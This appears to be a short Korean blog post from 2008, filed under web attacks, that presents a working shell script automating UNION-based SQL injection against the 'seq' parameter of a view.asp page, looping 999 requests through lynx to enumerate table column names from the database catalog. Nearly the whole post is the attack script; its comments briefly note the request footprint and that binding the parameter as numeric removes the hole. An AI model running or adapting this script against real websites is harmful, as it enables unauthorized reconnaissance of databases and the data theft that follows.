쉘스크립트를 통한 sql injection 자동화
웹/공격 2008. 11. 18. 10:12

#!/bin/sh
# Walks colno 1..999 for one table and prints whatever column metadata the
# server echoes back through a UNION-based SQL injection in the `seq` query
# parameter of view.asp.
#
# Usage: the table name is taken from $1. The author's commented-out example:
#   TNAME=TBLANGEL_FREE_USER
#
# Server-side footprint: 999 sequential GET requests from a lynx client, each
# with "UNION SELECT" and a read of `col` (colno/tname/cname; apparently a
# column-catalog view, confirm for the DBMS in use) inside the `seq` value.
# The technique depends on view.asp placing `seq` into its SQL text as-is;
# binding it as a numeric parameter, or rejecting non-integer values, removes
# the injection point.
TNAME=$1

ID=0
while [ "$ID" -lt 999 ]
do
  ID=$((ID + 1))
  # One request per colno. $TNAME lands unescaped inside the quoted SQL
  # literal; only response lines containing "SQLRESULT:" are printed.
  lynx -dump -source "http://test.com/view.asp?seq=1%20UNION%20SELECT%20'xxx',CSCONVERT('a'||':'||CSCONVERT(colno,'NCHAR_CS')||':'||CSCONVERT(tname,'NCHAR_CS')||':'||CSCONVERT(cname,'NCHAR_CS'),'20060101','bbbb',123%20FROM%20col%20WHERE%20colno=$ID%20AND%20tname='$TNAME'" | grep "SQLRESULT:"
done